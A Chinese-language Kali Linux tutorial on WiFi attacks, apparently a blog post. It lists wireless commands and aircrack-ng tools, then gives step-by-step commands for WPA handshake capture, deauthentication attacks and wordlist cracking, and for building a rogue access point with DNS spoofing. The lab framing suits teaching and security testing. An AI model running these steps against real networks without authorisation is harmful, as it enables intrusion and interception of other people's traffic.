一、 基础知识篇

1、

2、kali 中有关 WIFI 的相关命令

        2.1  ifconfig - 用来查看、配置、启用或禁用网络接口的工具

                    参数介绍:http://linux.51yip.com/search/ifconfig

        2.2  route - 用来对路由表进行操作,包括添加修改删除路由项

                    参数介绍:http://linux.51yip.com/search/route

        2.3  iwconfig - 系统配置无线网络设配或显示无线网络设备信息

                    参数介绍:http://linux.51yip.com/search/iwconfig

        2.4  iw - 新的基于 nl80211 的用于无线设备的CLI配置实用程序

                   参数介绍:http://www.voidcn.com/article/p-wtevzqwu-gm.html

        2.5  iwlist - 用于对/proc/net/wireless文件进行分析,得出无线网卡相关信息

                   参数介绍:https://www.cnblogs.com/liuliu-word/p/9646060.html

3、 

二、工具篇

1、 air*-ng 家族

        1.1  airmon-ng 用来改变无线网卡工作模式

        1.2  airodump-ng 用来捕获802.11数据报文

 

        1.3  aireplay-ng 在进行抓包时,可以根据需求创建特殊的无线网络数据报文及流量

 

 

        1.4  aircrack-ng 收集到足够的数据包后,可以自动检测数据包并判断是否可以破解

        1.5  airserv-ng 将无线网卡连接至某一特定端口,为攻击时灵活调用做准备

 

        1.6  airolib-ng 进行WPA Rainbow Table攻击时使用,用来建立特定数据库文件

 

        1.7  airdecap-ng 用来解开处于加密状态的数据包

                                                                         

        1.8  airbase-ng 用来构建虚拟 AP

                                                                        

        1.9  airdriver-ng

 

        1.10  airtun-ng

 

 

三、实践篇

1、利用 airmon-ng 家族实现 wifi 密码(WPA)破解

    1.1 实验工具

               VMware 虚拟机中运行的 kali系统、Ralink RT3070 无线网卡

    1.2 实验步骤

          1.2.1  在虚拟机中加载无线网卡

          1.2.2  在kali中加载无线网卡并且将无线网卡改为混杂模式

               查看无线网卡信息可以用 iwconfig 、ifconfig 命令   如下图

iwconfig
iwconfig
 ifconfig

              调为混杂模式  使用命令 airmon-ng  start  [参数 外部网卡名称 wlan0 ]

        1.2.3  使用 airodump-ng 命令查找附近 AP 信息

                 airodump-ng  [ 参数 将外部网卡调整成混杂模式后网卡名称 (可以通过ifconfig命令查看)  mon0 ]

airodump-ng  mon0

                  注意上图红框标的参数   BSSID -- AP的MAC地址    CH -- AP的传输频道   ENC -- AP使用的安全模式

                                                         ESSID -- AP的名称

          1.2.4  使用 airodump-ng 命令抓取AP的握手包 <一直打开抓包,直到抓到握手包>

airodump-ng  -w  cap [数据包名称  自己起的]  mon0  

           1.2.5  使用 aireplay-ng 发起deauthenticate攻击,加速获得握手包

aireplay-ng  -0 10  -a  [AP的BSSID]  -e [AP的ESSID] -c [连接AP终端的BSSID] mon0

                      获取连接AP终端信息 如下图所示

airodump-ng  --bssid  [被破解AP的BSSID]  mon0

              1.2.6  若抓到握手包,则取消 1.2.4 还在运行的 airodump-ng 抓包

                       [ 问 ]  如何知道抓到握手包了那 ?

                       [ 答 ]  可以通过 aircrack-ng  [参数  保存数据包的文件 *.cap]

kali 自动把保存数据包的文件进行编号  格式 <自己起的文件名>-<序号>.cap
aircrack-ng  wpa-01.cap

               1.2.7  利用 aircrack-ng 破解握手包

                           需要一个强大的密码本 [ 若密码本中有AP的密码才会破解出来,否则将不会成功 ]

aircrack-ng  -w  [ 密码本 wordlist.txt ]  [ 握手包  wpa-01.cap]

 

 2、利用 kismet 探查 AP 信息

      2.1  kismet 工具界面

             命令行键入 kismet

            选 OK

             选 YES

                 选 Start

                 选 YES  添加  source

                填入  网卡名称  选 Add

                  点击右下角,进入华 (zhuang) 丽 (bi) 的界面

          2.2  kismet 可以嗅探附近 AP 信息

                   关闭 kismet 后,系统会自动生成五个文件 ,分别为 Kismet-[ 运行时间 ]-1.alert  / Kismet-[ 运行时间 ]-1.gpsxml

                   Kismet-[ 运行时间 ]-1.nettxt  /  Kismet-[ 运行时间 ]-1.netxml  /  Kismet-[ 运行时间 ]-1.pcapdump

                  *.alert : 包含运行中的警告信息    *.gpsxml : 如果使用了GPS源,则相关的GPS数据保存在该文件中

                 *.nettxt : 包括所有收集的文本输出信息   *.netxml : 包括所有XML格式的数据    *.pacpdump : 抓取到的所有数据包

*.nettxt

 

*.netxml

 

 3、创建虚假AP并且实施DNS静态分析

          3.1 配置环境

                      1>  安装 hostapd 和 dnsmasq 软件

                            sudo apt-get install hostapd

                            sudo apt-get install dnsmasq

                       2> 开启外置网卡,并设置信息

                             ipconfig wlan0 up 10.0.0.1 netmask 255.255.255.0

                       3> 开启转发模式

                              echo 1 > /proc/sys/net/ipv4/ip_forward

          3.2 配置hostapd和dnsmasq的.conf文件

hostapd.conf
hostapd.conf

           

dnsmasq.conf

          3.3 设置防火墙规则

                      1>  sudo iptables -F

                      2>  sudo iptables -t nat -F

                      3>  sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

                      4>  sudo iptables -A FORWARD -i wlan0 -j ACCEPT

          3.4 开启服务

                      1>  dnsmasq

                       由于 nl80211 驱动程序存在一些漏洞,所以需要执行下列命令

                             >  nmcli  radio  wifi  off

                             >  rfkill  unblock  wlan

                             >  ip   link  set  dev  wlan0  up

                      2>  hostapd /etc/hostapd/hostapd.conf

                      <注> 如果无法开启dnsmasq服务,则需要ps aux | grep 'dnsmasq',并且 kill dnsmasq,再尝试启动。

          3.5 连接,并且测试 

                      > 成功访问百度首页,即实验成功...

         3.6 设置DNS静态解析

                     在 dnsmasq.conf 文件中添加 address=/test.com/10.0.0.1,表示用户访问域名为 test.com的网站时,DNS将其解析为10.0.0.1

         3.7 验证结果

                     用户访问 www.test.com ,定向解析到10.0.0.1/index.html文件,实验成功...

四、疑问篇

 

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐